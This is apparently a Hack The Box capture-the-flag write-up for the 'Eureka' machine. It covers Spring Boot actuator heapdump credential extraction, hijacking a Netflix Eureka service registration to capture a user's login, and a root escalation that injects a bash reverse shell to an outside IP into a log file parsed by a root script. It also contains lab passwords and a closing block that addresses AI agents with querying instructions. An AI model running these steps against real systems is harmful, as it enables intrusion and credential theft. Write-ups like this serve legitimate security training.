# Eureka

## Recon Using the [Scripts/Functions/Tools](broken://pages/zMqDWO05uXxRugpbm2dZ) {% code title="nmap -sCV -T4 -oA " overflow="wrap" %} ``` PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.12 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 3072 d6:b2:10:42:32:35:4d:c9:ae:bd:3f:1f:58:65:ce:49 (RSA) | 256 90:11:9d:67:b6:f6:64:d4:df:7f:ed:4a:90:2e:6d:7b (ECDSA) |_ 256 94:37:d3:42:95:5d:ad:f7:79:73:a6:37:94:45:ad:47 (ED25519) 80/tcp open http nginx 1.18.0 (Ubuntu) |_http-title: Did not follow redirect to http://furni.htb/ |_http-server-header: nginx/1.18.0 (Ubuntu) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel ``` {% endcode %} Adding new hosts {% code title="etc/hosts entry" overflow="wrap" %} ``` 10.129.242.192 eureka.htb furni.htb ``` {% endcode %} ### Furni-Website

``` ➜ eureka dirsearch -u http://furni.htb/ -e php,html,txt -t 50 /usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html from pkg_resources import DistributionNotFound, VersionConflict _|. _ _ _ _ _ _|_ v0.4.3 (_||| _) (/_(_|| (_| ) Extensions: php, html, txt | HTTP method: GET | Threads: 50 | Wordlist size: 10403 Output File: /mnt/e/hacking/hackthebox/Machines/eureka/reports/http_furni.htb/__25-04-27_22-17-19.txt Target: http://furni.htb/ [22:17:19] Starting: [...] [22:17:27] 200 - 2KB - /actuator [22:17:27] 400 - 105B - /actuator/;/sso [22:17:27] 400 - 115B - /actuator/;/springWebflow [22:17:27] 400 - 112B - /actuator/;/statistics [22:17:27] 400 - 113B - /actuator/;/ssoSessions [22:17:27] 400 - 108B - /actuator/;/status [22:17:27] 400 - 112B - /actuator/;/threaddump [22:17:27] 400 - 107B - /actuator/;/trace [22:17:27] 200 - 20B - /actuator/caches [22:17:27] 200 - 6KB - /actuator/env [22:17:27] 200 - 2B - /actuator/info [22:17:27] 200 - 467B - /actuator/features [22:17:27] 200 - 76MB - /actuator/heapdump [22:17:27] 200 - 3KB - /actuator/metrics [22:17:27] 200 - 54B - /actuator/scheduledtasks [22:17:28] 200 - 198KB - /actuator/beans [22:17:28] 400 - 108B - /actuator/sessions [22:17:28] 405 - 114B - /actuator/refresh [22:17:28] 200 - 96KB - /actuator/loggers [22:17:29] 200 - 15B - /actuator/health [22:17:29] 200 - 35KB - /actuator/mappings [22:17:29] 200 - 180KB - /actuator/conditions [22:17:29] 400 - 106B - /admin/%3bindex/ [22:17:30] 200 - 824KB - /actuator/threaddump [22:17:30] 400 - 98B - /admin;/ [22:17:31] 400 - 98B - /Admin;/ [22:17:31] 200 - 36KB - /actuator/configprops [...] ``` Leaking information because of misconfigured Spring Boot Acutators\ \ Checking a common entry points list ``` /actuator/env /actuator/auditevents /actuator/beans /actuator/caches /actuator/configprops /actuator/flyway /actuator/health /actuator/heapdump /actuator/httptrace /actuator/info /actuator/integrationgraph /actuator/liquibase /actuator/configprops /actuator/shutdown ``` We find a heapdump at
Using a script with the help of chat-gpt we find a password: ``` GNU nano 8.3 head-search.sh #!/bin/bash # Usage check if [ $# -lt 1 ]; then echo "Usage: $0 " exit 1 fi HEAPDUMP="$1" OUTPUT="sensitive_findings.txt" # Colors RED='\033[1;31m' GREEN='\033[1;32m' YELLOW='\033[1;33m' NC='\033[0m' # No Color echo "[*] Extracting and searching in $HEAPDUMP..." echo "" > "$OUTPUT" # Search for sensitive patterns strings "$HEAPDUMP" | grep -Ei 'password[ =:][^[:space:]]+|passwd[ =:][^[:space:]]+|pwd[ =:][^[:space:]]+|secret[ =:][^[:space:]]+|token[ =:][^[:space:]]+|key[ =:][^[:space:]]+|credential[ =:][^[:space:]]+|auth[ =:][^[:space:]]+|sess> echo "[*] Search completed! Found $(wc -l < "$OUTPUT") potential sensitive items." echo # Pretty print while IFS= read -r line; do if echo "$line" | grep -iq 'password\|passwd\|pwd'; then echo -e "${RED}[PASSWORD FOUND]${NC} ${YELLOW}${line}${NC}" elif echo "$line" | grep -iq 'secret\|token\|key\|credential\|auth\|session'; then echo -e "${GREEN}[TOKEN/SECRET FOUND]${NC} ${YELLOW}${line}${NC}" elif echo "$line" | grep -qE 'AKIA[0-9A-Z]{16}|ASIA[0-9A-Z]{16}'; then echo -e "${GREEN}[AWS KEY FOUND]${NC} ${YELLOW}${line}${NC}" elif echo "$line" | grep -qE '[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}'; then echo -e "${GREEN}[EMAIL FOUND]${NC} ${YELLOW}${line}${NC}" elif echo "$line" | grep -qE '([0-9]{4}[- ]?){3}[0-9]{4}'; then echo -e "${GREEN}[CREDIT CARD?]${NC} ${YELLOW}${line}${NC}" else echo -e "${YELLOW}[OTHER]${NC} $line" fi done < "$OUTPUT" echo echo "[*] Full results also saved in: $OUTPUT" ``` ``` [..] [PASSWORD FOUND] {password=0sc@r190_S0l!dP@sswd, user=oscar190}!, [..] ``` ## User ``` ➜ eureka ssh oscar190@furni.htb oscar190@furni.htb's password: 0sc@r190_S0l!dP@sswd Welcome to Ubuntu 20.04.6 LTS (GNU/Linux 5.4.0-214-generic x86_64) * Documentation: https://help.ubuntu.com * Management: https://landscape.canonical.com * Support: https://ubuntu.com/pro System information as of Sun 27 Apr 2025 09:00:04 PM UTC System load: 0.0 Usage of /: 63.8% of 6.79GB Memory usage: 47% Swap usage: 0% Processes: 244 Users logged in: 0 IPv4 address for eth0: 10.129.182.126 IPv6 address for eth0: dead:beef::250:56ff:fe94:4834 Expanded Security Maintenance for Applications is not enabled. 0 updates can be applied immediately. 2 additional security updates can be applied with ESM Apps. Learn more about enabling ESM Apps service at https://ubuntu.com/esm Last login: Sun Apr 27 21:00:06 2025 from 10.10.14.71 oscar190@eureka:~$ ``` We find another password in the application.yml of the eureka-server ``` oscar190@eureka:/var/www/web/Eureka-Server$ grep -Ei -C 5 'password|secret|api[_-]?key|token' ./target/classes/application.yaml name: "Eureka Server" security: user: name: EurekaSrvr password: 0scarPWDisTheB3st server: port: 8761 address: 0.0.0.0 ``` ### nmap-full-scan The full scan shows the other http-server eureka on port 8761 or like seen in the command above

### Eureka-Server Using these credentials we can login

Create new fake service using this [Hacking Netlix Eureka](https://medium.com/@mfocuz/hacking-netflix-eureka-8e5957b2f539) as example {% code title="Change YOURIP" overflow="wrap" %} ``` curl -X POST http://EurekaSrvr:0scarPWDisTheB3st@furni.htb:8761/eureka/apps/USER-MANAGEMENT-SERVICE -H 'Content-Type: application/json' -d '{ "instance": { "instanceId": "USER-MANAGEMENT-SERVICE", "hostName": "YOURIP", "app": "USER-MANAGEMENT-SERVICE", "ipAddr": "YOURIP", "vipAddress": "USER-MANAGEMENT-SERVICE", "secureVipAddress": "USER-MANAGEMENT-SERVICE", "status": "UP", "port": { "$": 8081, "@enabled": "true" }, "dataCenterInfo": { "@class": "com.netflix.appinfo.InstanceInfo$DefaultDataCenterInfo", "name": "MyOwn" } } }' ``` {% endcode %} After some time we get the User and Password on our listener ``` ➜ eureka rlwrap nc -nlvp 8081 listening on [any] 8081 ... connect to [10.10.14.71] from (UNKNOWN) [10.129.16.221] 50338 POST /login HTTP/1.1 X-Real-IP: 127.0.0.1 X-Forwarded-For: 127.0.0.1,127.0.0.1 X-Forwarded-Proto: http,http Content-Length: 168 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.8 Cache-Control: max-age=0 Content-Type: application/x-www-form-urlencoded Cookie: SESSION=NTI4MDg3OTgtM2E3MS00ZmE0LWFkYmQtYjQ1NWRlMjM4NDdj User-Agent: Mozilla/5.0 (X11; Linux x86_64) Forwarded: proto=http;host=furni.htb;for="127.0.0.1:56148" X-Forwarded-Port: 80 X-Forwarded-Host: furni.htb host: 10.10.14.71:8081 username=miranda.wise%40furni.htb&password=IL%21veT0Be%26BeT0L0ve&_csrf=BDpsWbgK9mVLFJVx5FuxOvZT2DfbiKCuM7CjmcVRPi8gMtPBNwpbOoBrwwRmJfBBhnaFA8My9VbqvJKDAoKUoadmD04YULD3ls ``` Change the coding using [cyberchef](https://gchq.github.io/CyberChef/#recipe=URL_Decode\&input=SUwlMjF2ZVQwQmUlMjZCZVQwTDB2ZQ) we get the user-flag ``` ➜ eureka ssh miranda-wise@furni.htb miranda-wise@furni.htb's password: IL!veT0Be&BeT0L0ve Welcome to Ubuntu 20.04.6 LTS (GNU/Linux 5.4.0-214-generic x86_64) * Documentation: https://help.ubuntu.com * Management: https://landscape.canonical.com * Support: https://ubuntu.com/pro System information as of Thu 10 Apr 2025 07:41:57 AM UTC System load: 0.04 Usage of /: 84.1% of 8.02GB Memory usage: 44% Swap usage: 0% Processes: 248 Users logged in: 1 IPv4 address for eth0: 10.129.232.19 IPv6 address for eth0: dead:beef::250:56ff:feb9:f97 Expanded Security Maintenance for Applications is not enabled. 0 updates can be applied immediately. 2 additional security updates can be applied with ESM Apps. Learn more about enabling ESM Apps service at https://ubuntu.com/esm Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings Last login: Mon Apr 28 16:17:19 2025 from 10.10.14.71 miranda-wise@eureka:~$ ``` ## Root Checking for procs running with root privs show us a log\_analyse.sh ``` ps -eo user,pid,comm | grep '^root' [..] root 4105259 log_analyse.sh root 4105350 log_analyse.sh ``` Searching for log\_analyse.sh
``` miranda-wise@eureka:/$ find . -name log_analyse.sh find: ‘./boot/lost+found’: Permission denied find: ‘./var/tmp/systemd-private-83645e554a1047198652b4 [..] ./opt/log_analyse.sh ``` In that file at analyze\_http\_statuses() we can ``` code=$(echo "$line" | grep -oP 'Status: \K.*') ``` {% code overflow="wrap" %} ``` miranda-wise@eureka:~$ rm -f /var/www/web/user-management-service/log/application.log miranda-wise@eureka:~$ echo 'HTTP Status: x[$(/bin/bash -i >& /dev/tcp/10.10.14.71/1337 0>&1)]' > /var/www/web/user-management-service/log/application.log ``` {% endcode %} ``` ➜ eureka rlwrap nc -nlvp 1337 │➜ eureka ssh miranda.wise@furni.htb listening on [any] 1337 ... │miranda.wise@furni.htb's password: │Permission denied, please try again. connect to [10.10.14.71] from (UNKNOWN) [10.129.16.221] 41958 │miranda.wise@furni.htb's password: bash: cannot set terminal process group (1726439): Inappropriate ioctl for device │ bash: no job control in this shell │➜ eureka root@eureka:~# ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://mux1337.gitbook.io/write-up-_/hack-the-box/machines/eureka.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.